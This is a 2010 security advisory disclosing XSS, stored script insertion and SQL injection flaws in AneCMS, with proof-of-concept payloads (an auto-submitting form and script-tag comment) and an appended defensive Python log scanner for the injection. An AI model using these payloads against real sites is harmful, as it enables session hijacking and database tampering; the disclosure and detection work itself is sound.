High-Tech Bridge, HTB22406
May 28, 2010

Multiple Vulnerabilities in AneCMS

High-Tech Bridge
www.htbridge.com

EPSS: 0.002 (Low), percentile 57.2%

High-Tech Bridge SA Security Research Lab has discovered three vulnerabilities in AneCMS which could be exploited to perform cross-site scripting and script insertion attacks and to execute arbitrary SQL commands in the application's database.

  1. Cross-site scripting (XSS) vulnerability in AneCMS
    The vulnerability exists due to an input sanitization error in the “descr” parameter in acp/pages/cfg.php. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary HTML and script code in a user's browser in the context of the vulnerable website.
    Exploitation example:
    <form action="http://demo.anecms.com/acp/?p=cfg&amp;m=smod" method="post" name="main" >
    <input type="hidden" name="title" value="ANE CMS" />
    <input type="hidden" name="descr" value='A New Era of CMS DEMO "><script>alert(document.cookie)</script>' />
    <input type="hidden" name="language" value="it" />
    <input type="hidden" name="url_base" value="http://demo.anecms.com/" />
    </form>
    <script>
    document.main.submit();
    </script>

  2. Script insertion vulnerability in AneCMS: CVE-2010-2437
    Input passed to the “comment” field is not properly sanitized before being stored in modules/blog/index.php. A remote attacker can insert arbitrary HTML and script code, which will be executed in a user's browser in the context of the vulnerable website when the user views the malicious data.
    Exploitation example:
    To exploit this vulnerability fill in the comment field with the following text:
    hello <script>alert(document.cookie)</script>

  3. SQL injection vulnerability in AneCMS: CVE-2010-2436
    The vulnerability exists due to an input sanitization error in the URL handling of the modules/blog/index.php script. A remote attacker can send a specially crafted HTTP GET request to the vulnerable script and execute arbitrary SQL commands in the application's database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database.
    Exploitation example:
    http://host/blog/1+ANY_SQL_CODE_HERE/Demo_of_ANE_CMS#comment-63
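
A log check for item 3, added here as an example and not taken from the High-Tech Bridge advisory or from AneCMS: it flags blog requests whose id path segment is anything other than a plain number. It assumes the `/blog/<id>/<slug>` route shape seen in the example URL and Common Log Format access logs; the log lines and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Assumption: route shape /blog/<numeric post id>/<slug>, inferred from the
# advisory's example URL. The "#comment-63" fragment never reaches the server.
BLOG_ROUTE = re.compile(r"^/blog/([^/?#]+)")
# Request field of a Common Log Format line: "METHOD path HTTP/x.y"
REQUEST = re.compile(r'"[A-Z]+ (?P<path>\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP range, placeholder payload).
SAMPLE_LOG = [
    '192.0.2.10 - - [28/May/2010:10:00:01 +0000] "GET /blog/1/Demo_of_ANE_CMS HTTP/1.1" 200 5120',
    '192.0.2.44 - - [28/May/2010:10:00:07 +0000] "GET /blog/1+ANY_SQL_CODE_HERE/Demo_of_ANE_CMS HTTP/1.1" 200 5120',
    '192.0.2.44 - - [28/May/2010:10:00:09 +0000] "GET /blog/1%20ANY_SQL_CODE_HERE/Demo_of_ANE_CMS HTTP/1.1" 200 5120',
    '192.0.2.10 - - [28/May/2010:10:00:12 +0000] "GET /index.php HTTP/1.1" 200 900',
]


def blog_id_segment(path):
    """Return the URL-decoded id segment of a /blog/ request, or None otherwise."""
    m = BLOG_ROUTE.match(path)
    return unquote_plus(m.group(1)) if m else None


def is_valid_blog_id(segment):
    """A legitimate post id is a short run of ASCII digits and nothing else."""
    return re.fullmatch(r"[0-9]{1,10}", segment) is not None


def scan(log_lines):
    """Return (line_number, decoded_segment) for blog requests with a non-numeric id."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue  # not a parseable request line
        seg = blog_id_segment(m.group("path"))
        if seg is not None and not is_valid_blog_id(seg):
            hits.append((n, seg))
    return hits


if __name__ == "__main__":
    for n, seg in scan(SAMPLE_LOG):
        print(f"line {n}: non-numeric blog id {seg!r}")
```

The same `is_valid_blog_id` test works as a server-side allow-list before the id reaches a query, alongside parameterized statements.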

CPE Name    Operator    Version
anecms      le          1.3
